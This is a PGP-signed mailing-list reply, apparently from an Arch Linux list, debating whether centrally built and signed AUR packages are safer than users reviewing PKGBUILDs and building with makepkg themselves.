-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 On 04/11/2014 07:45 PM, Taylor Hornby wrote: > On 04/11/2014 04:27 PM, Daniel Wallace wrote: >> So you're saying... blindly trusting someone else that is unknown >> to build and blindly sign a package is more secure than you >> downloading the pkgbuild with cower or something, looking at the >> PKGBUILD, and then using makepkg... > >> How is that? > > No, that person has to be trusted not to actively sign malicious > binaries of their own creation and to keep their private key secret. > > I'm saying: A single trusted person blindly building and singing > packages is more secure than everyone blindly building and signing > packages. > > It's a single opportunity for attack on everyone versus an opportunity > for an attack each time a user installs a package from the AUR. The > former is more detectable after-the-fact (thus much less likely to be > done by an intelligence agency like the NSA) and can be done in a safer > environment (cable internet connection in the USA vs. a WiFi hotspot in > Syria). > > The process could also involve grabbing the files (or hashes) through > different Tor exit nodes and comparing them to make sure they're all the > same, and there's no attacker messing with the local Internet > connection. > > >> Second, where do you propose the computing time and the storage >> space comes from to support this kind of repository? > > > Would it really be that much? How do other distributions manage it? > > -Taylor > > Salutations, The point of Arch is that security is mainly a user concern. Arch doesn't target users who would just blindly install packages from the AUR without reading the PKGBUILD first, or reading the source code as another step. If one doesn't know how to compile and/or modify the code they are using, they really shouldn't be using the code. While other distributions do this, I strongly disagree with it. Arch users should read the wiki on how to compile with makepkg before attempting to install packages from the AUR. By the way, installing a package can be as simple as "$ makepkg -s -r -i" or more complicated if further dependencies must be compiled. Security through a messiah is as useful as security through obscurity. Regards, Mark -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.22 (GNU/Linux) iF4EAREIAAYFAlNIhgUACgkQZ/Z80n6+J/ZudAD/QSrAwDUtelbUV9MKB6m51tSi j/8orGFQE4uaUPb6hwwA/Alcgy8mLCTExbbVPDy7TPwYHW5tp9+moDs+enMHA4sv =ES3a -----END PGP SIGNATURE-----
